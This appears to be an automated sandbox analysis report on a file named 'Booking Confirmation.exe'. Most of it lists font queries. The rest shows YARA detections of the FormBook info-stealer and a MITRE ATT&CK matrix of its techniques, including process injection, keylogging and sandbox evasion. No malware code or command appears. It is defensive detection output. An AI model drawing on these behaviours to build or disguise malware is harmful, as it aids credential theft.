Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery331	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Virtualization/Sandbox Evasion14	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion14	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection512	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
